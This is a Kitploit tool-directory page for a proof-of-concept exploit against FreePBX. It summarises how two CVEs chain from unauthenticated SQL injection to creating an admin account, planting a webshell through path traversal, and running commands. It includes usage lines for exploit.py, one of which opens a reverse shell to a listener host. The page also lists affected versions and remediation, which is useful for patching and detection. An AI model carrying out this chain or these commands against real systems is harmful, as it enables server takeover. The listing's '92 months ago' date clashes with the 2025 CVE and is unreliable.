Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
Tools/GitHubGitHub/teteren/cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

View Repository
92 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

FreePBX 16 — Unauthenticated SQLi to RCE

Summary: This guide demonstrates how to chain two vulnerabilities in FreePBX 16 (CVE-2025-57819 and CVE-2025-61678) to achieve a complete attack chain from unauthenticated access to Remote Code Execution (RCE).

Vulnerability / CVE Information

CVE IDAffected ComponentImpact & Vulnerability Type
CVE-2025-57819Endpoint module loader (brand parameter)Unauthenticated stacked SQL injection
CVE-2025-61678Endpoint Manager firmware upload handler (fwbrand parameter)Authenticated arbitrary file upload / Path Traversal

Attack Principle and Flow

Create Administrator Account (CVE-2025-57819)

Trigger the unauthenticated stacked SQL injection vulnerability through the Namespaced Endpoint Loader to directly write a brand-new administrator account with full privileges into the ampusers table.

Authentication

Log in to the FreePBX admin panel using the newly created administrator credentials.

Write WebShell (CVE-2025-61678)

Abuse the firmware upload functionality of Endpoint Manager, combined with the path traversal vulnerability in the fwbrand parameter (../../../var/www/html/

), to write a PHP WebShell directly into the web root directory.

Command Execution

Invoke the deployed WebShell to execute a single system command or establish an interactive reverse shell.

Affected Versions and Remediation

Affected versions: FreePBX 16 (Endpoint module versions below 16.0.92), FreePBX 17 (versions before 17.0.6).

Remediation: Update to the latest patched version as soon as possible.

Usage

# Execute a single command
python3 exploit.py --rhost pbx.example.com --command "id"

# Establish an interactive reverse shell (using pwntools to automatically listen)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# Use plain HTTP with a custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Parameter Description (Options)

ParameterDescription
--rhost[Required] Target host address
--rportTarget port (default: 443)
--httpForce HTTP instead of the default HTTPS
Download Tool